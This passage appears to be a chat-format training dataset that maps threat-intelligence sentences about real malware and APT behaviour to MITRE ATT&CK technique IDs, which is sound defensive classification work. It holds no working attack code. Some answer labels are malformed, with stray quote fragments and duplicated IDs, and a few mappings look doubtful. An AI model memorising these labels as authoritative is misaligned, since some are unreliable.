- "content": "Dragonfly has obtained and used tools such as Mimikatz, CrackMapExec, and PsExec."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remexi uses BITSAdmin to communicate with the C2 server over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "runs tasklist to obtain running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cisco Talos has observed another malware campaign that utilizes malicious Microsoft Office documents (maldocs) to spread the remote access trojan (RAT) ObliqueRAT. This campaign targets organizations in South Asia. ObliqueRAT has been linked to the Transparent Tribe APT group in the past. This campaign hides the ObliqueRAT payload in seemingly benign image files hosted on compromised websites"
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link', 'T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Xbash can use regsvr32 for executing scripts."
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "On the first contact, it will send an identification of the victim based on the hard disk volume serial number. Talos didn't identify any kind of anti-sandboxing mechanisms on it, either"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "cmd can be used to delete files from the file system."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Variants of have used rundll32.exe in Registry values added to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of starting a process using CreateProcess."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pay2Key can identify the IP and MAC addresses of the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can upload and download to/from a victim machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emotet has been observed creating new services to maintain persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PUNCHBUGGY has been observed using a Registry Run key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RCSession can capture screenshots from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Heyoka Backdoor can check if it is running as a service on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Winnti Group has downloaded an auxiliary program named ff.exe to infected machines."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses incoming HTTP requests with a username keyword and commands and handles them as instructions to perform actions."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TEMP.Veles has used compromised VPN accounts."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Inception used a file listing plugin to collect information about file and directories both on local and remote drives."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KONNI has used \"net session\" on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "obtains the victim username and encrypts the information to send over its C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It was used to overwrite data by the BE2 actor, destroying data stored on hard drives by overwriting file contents. While its use may be intended to cover their tracks, it is heavy handed to use this type of tool to cover one’s tracks in a network. Most likely it is a tool of sabotage, much like the Destover wiper seen on Sony Pictures Entertainment’s networks. Instead of re-using the commercial EldoS RawDisk drivers in their malware, the BE2 developers wrote their own low-level disk and file destruction routines"
- },
- {
- "role": "assistant",
- "content": "T1485 - Data Destruction"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tropic Trooper has executed commands through Microsoft security vulnerabilities, including CVE-2017-11882, CVE-2018-0802, and CVE-2012-0158."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWERTON has the ability to dump password hashes."
- },
- {
- "role": "assistant",
- "content": "T1003.002 - OS Credential Dumping: Security Account Manager"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has used `fsutil fsinfo drives`, `systeminfo`, and `vssadmin list shadows` for system information including shadow volumes and drive information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Through the use of this platform, the operator was able to monitor and manage various compromised email accounts simultaneously"
- },
- {
- "role": "assistant",
- "content": "T1586.002 - Email Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some versions of DEATHRANSOM have performed language ID and keyboard layout checks; if either of these matched Russian, Kazakh, Belarusian, Ukrainian or Tatar DEATHRANSOM would exit."
- },
- {
- "role": "assistant",
- "content": "T1614.001 - System Location Discovery: System Language Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lucifer can use WMI to log into remote machines for propagation."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In some cases, LockBit 2.0 will limit the data transfer sizes to fly under the radar of any monitoring services a client may have set up."
- },
- {
- "role": "assistant",
- "content": "T1030 - Data Transfer Size Limits', 'T1030 - Data Transfer Size Limits"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Skidmap has installed itself via crontab."
- },
- {
- "role": "assistant",
- "content": "T1053.003 - Scheduled Task/Job: Cron"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Execute a remote shell; - Silently start a program on a victim host; - Retrieve a list of processes from the victim host; - Terminate any process; - Upload/Download/Delete files to/from victim host; - Retrieve a list of available drives from the victim host; - Retrieve a filelist of a specified folder from the victim host"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer', 'T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KEYMARBLE can upload files to the victim’s machine and can download additional payloads."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Honeybee, the threat actors used batch files that modified registry keys."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "copies a file over to the remote system before execution."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Net commands used with the \"/domain\" flag can be used to gather information about and manipulate user accounts on the current domain."
- },
- {
- "role": "assistant",
- "content": "T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Windshift has sent spearphishing emails with attachment to harvest credentials and deliver malware."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HiddenWasp uses a rootkit to hook and implement functions on the system."
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dark Caracal took screenshots using their Windows malware."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "14, 2017, FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KOCTOPUS can use the `LoadResource` and `CreateProcessW` APIs for execution."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot can obtain passwords stored in files from several applications such as Outlook, Filezilla, OpenSSH, OpenVPN and WinSCP. Additionally, it searches for the \".vnc.lnk\" affix to steal VNC credentials."
- },
- {
- "role": "assistant",
- "content": "T1552.001 - Unsecured Credentials: Credentials In Files"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zeus Panda checks for running processes on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The campaigns maintain persistence on machines by creating two daily scheduled task entries."
- },
- {
- "role": "assistant",
- "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If an initial connectivity check fails, attempts to extract proxy details and credentials from Windows Protected Storage and from the IE Credentials Store. This allows the adversary to use the proxy credentials for subsequent requests if they enable outbound HTTP access."
- },
- {
- "role": "assistant",
- "content": "T1552.001 - Unsecured Credentials: Credentials In Files"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Its functions include self-starting of the backdoor, collection of network configuration, keystroke records, and schedule other modules to execute by means of timers"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carberp has captured credentials when a user performs login through a SSL session."
- },
- {
- "role": "assistant",
- "content": "T1185 - Browser Session Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "samples sometimes use common binary packers such as UPX and Aspack on top of a custom Delphi binary packer."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OverWatch observed the threat actor retrieve three files with VBS file extensions from remote infrastructure. These files were then decoded using cscript.exe into an EXE, DLL and DAT file respectively. Based on the telemetry available, OverWatch believes these files likely constituted a reverse shell, which was loaded into memory via DLL search-order hijacking.2"
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has used Win7Elevate to inject malicious code into explorer.exe."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To avoid being run in sandboxes and emulators, all MegaCortex versions implement file encryption threading based on querying for the number of CPUs in the system. All MegaCortex versions can detect if the binary is running with administrator privileges"
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoetRAT was delivered with documents using DDE to execute malicious code."
- },
- {
- "role": "assistant",
- "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has compressed exfiltrated data with RAR and used RomeoDelta malware to archive specified directories in .zip format, encrypt the .zip file, and upload it to C2."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has gained initial access via vulnerable webservers."
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can lists information about files in a directory."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used Base64 to encode C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Milan has received files from C2 and stored them in log folders beginning with the character sequence `a9850d2f`."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "jRAT can capture clipboard data."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "VaporRage can use HTTP to download shellcode from compromised websites."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used Base64 to obfuscate commands and the payload."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Andariel has used \"tasklist\" to enumerate processes and find a specific string."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Get2 has the ability to inject DLLs into processes."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In recent years, malware delivery mechanisms have changed from fixed media (diskettes) to email (e.g. the infamous LoveLetter email worm) and direct network attacks (e.g. CodeRed). The most recent step in the evolution process is a move to delivering malware via the world wide web."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file “gracious_truth.jpg”, which likely has a fake JPG header. TEARDROP does not have code overlap with any previously seen malware. We believe that this was used to execute a customized Cobalt Strike BEACON"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PsExec is then used to launch PowerShell which uses the win32_service WMI class to retrieve services and the net stop command to stop these services. After Windows Defender is disabled and services have been stopped across the organization, PsExec is used to launch the WastedLocker ransomware itself, which then begins encrypting data and deleting shadow volumes"
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools', 'T1489 - Service Stop', 'T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "f) Hadoop YARN ResourceManager – Command Execution (exploit) g) CVE-2016-3088: Apache ActiveMQ Fileserver File Upload Remote Code Execution Vulnerability"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution', 'T1203 - Exploitation for Client Execution', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Before running the above command to open the decoy document, the shellcode enumerates the running processes on the system, specifically looking for processes created for an executable with a filename that starts with “avp. presumably in an attempt to find Kaspersky’s antivirus process. If the process is found, the shellcode will not open the decoy document and exits"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CCBkdr can use a DGA for Fallback Channels if communications with the primary command and control server are lost."
- },
- {
- "role": "assistant",
- "content": "T1568.002 - Domain Generation Algorithms"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The SP variable is a string containing the victim's username"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The browser extension serves as adware and an infostealer, leaking all of the user’s search engine queries. We discovered significant changes and additions of capabilities throughout this campaign's evolution, and we predict further changes as this campaign continues."
- },
- {
- "role": "assistant",
- "content": "T1217 - Browser Bookmark Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mori can use Base64 encoded JSON libraries used in C2."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "attempted to trick targets into clicking on a link featuring a seemingly legitimate domain from Adobe.com to download their malware and gain initial access."
- },
- {
- "role": "assistant",
- "content": "T1598.003 - Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADCALL uses a FakeTLS method during C2."
- },
- {
- "role": "assistant",
- "content": "T1001.003 - Protocol or Service Impersonation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be used to discover system firewall settings."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Vasport can download files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Koadic can gather hashed passwords by gathering domain controller hashes from NTDS."
- },
- {
- "role": "assistant",
- "content": "T1003.003 - OS Credential Dumping: NTDS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses the command-line interface."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ThiefQuest uses the \"CGEventTap\" functions to perform keylogging."
